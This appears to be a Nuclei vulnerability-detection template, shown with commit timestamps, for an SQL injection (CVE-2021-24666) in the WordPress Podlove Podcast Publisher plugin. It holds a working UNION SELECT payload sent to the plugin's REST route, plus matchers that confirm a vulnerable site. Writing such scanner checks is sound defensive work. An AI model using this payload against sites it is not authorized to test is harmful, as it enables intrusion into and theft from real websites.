2023-03-31 11:28:24 +00:00
id : CVE-2021-24666
info :
2023-04-12 19:37:45 +00:00
name : WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection
2023-03-31 11:28:24 +00:00
author : theamanrawat
severity : critical
description : |
2023-04-12 19:37:45 +00:00
WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P<id>[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
2023-03-31 11:28:24 +00:00
reference :
- https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe
- https://wordpress.org/plugins/podlove-podcasting-plugin-for-wordpress/
2023-03-31 16:11:22 +00:00
- https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76
2023-04-12 19:37:45 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24666
remediation : Fixed in version 3.5.6.
2023-03-31 11:28:24 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2021-24666
cwe-id : CWE-89
2023-07-11 19:49:27 +00:00
epss-score : 0.20933
cpe : cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.95759
2023-03-31 11:28:24 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : podlove
product : podlove_podcast_publisher
2023-03-31 16:11:22 +00:00
tags : cve2021,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,cve
2023-03-31 11:28:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-31 11:28:24 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"
matchers-condition : and
matchers :
- type : word
part : body
words :
- '66a82937a7660b73b00d4f7cefee6c85'
- '"service_id"'
condition : and
- type : word
part : header
words :
- "application/json"
- type : status
status :
- 200